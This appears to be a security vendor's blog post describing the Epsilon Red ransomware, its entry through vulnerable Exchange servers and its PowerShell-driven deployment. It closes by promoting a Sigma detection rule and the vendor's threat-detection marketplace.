REvil gang may stand behind the brand-new malware variant that explicitly attacks enterprise Microsoft Exchange servers to penetrate corporate networks. The new threat relies on a batch of PowerShell scripts weaponized to exploit known vulnerabilities for final payload delivery. Currently, researchers confirmed at least one successful attack ended up in a 4.29BTC ($210,000) ransom payment.
The new player in the malicious arena was identified by Sophos experts in late May 2021 while investigating the attack against a US-based hospitality vendor. The analysis reveals that Epsilon Red is a rather simple 64-bit Windows executable coded in Go language. The functionality is lobbed and used only for file encryption, while other more sophisticated tasks are farmed out to PowerShell scripts.
According to the Sophos inquiry, adversaries relied on exposed Microsoft Exchange Servers for initial intrusion. Currently, it is unclear if they used nefarious Exchange ProxyLogon exploit. Yet, the investigation confirms that the targeted server was definitely vulnerable to it. After entering the network, intruders leveraged Windows Management Instrumentation (WMI) tooling to drop other software onto machines reachable from the Exchange server.
To proceed with the attack, threat actors utilized more than a dozen PowerShell scripts, which prepare the targeted environment for the ransomware payload as well as push and initiate the Epsilon Red executable. Notably, the obfuscation mechanism for these PowerShell scripts is rather weak and rudimentary. Nevertheless, it is sufficient to evade detection with popular anti-virus solutions.
Security experts suspect that the infamous REvil gang might be behind the Epsilon Red development. The key hint to this assumption is the ransom note popping up on the compromised instances. It resembles the one left behind REvil ransomware, but with some additions and grammatical updates. Apart from the ransom note, Epsilon Red has nothing in common with REvil, with unique tools and tactics applied across the attacks.
To protect your company infrastructure and prevent possible Epsilon Red infections, you can download a community Sigma rule released by our prolific Threat Bounty developer Sittikorn Sangrattanapitak.
The rule has translations to the following languages:
SIEM: Azure Sentinel, ELK Stack
Tactics: Reconnaissance, Execution
Techniques: Active Scanning (T1595), Command and Scripting Interpreter (T1059)
Since the initial infection vector is suspected to be a Microsoft Exchange server vulnerable to ProxyLogon exploit, we highly recommend admins upgrade their installations to the latest secure version ASAP. Also, Threat Detection Marketplace users might reach a set of Sigma rules aimed at ProxyLogon detection to identify existing security holes.
Looking for more threat detection content? Sign up for Threat Detection Marketplace for free and reach over 100K curated SOC content items addressing the latest attacks and customized to your environment. Eager to craft your own Sigma rules? Join our Threat Bounty Program and get recurring rewards for your input!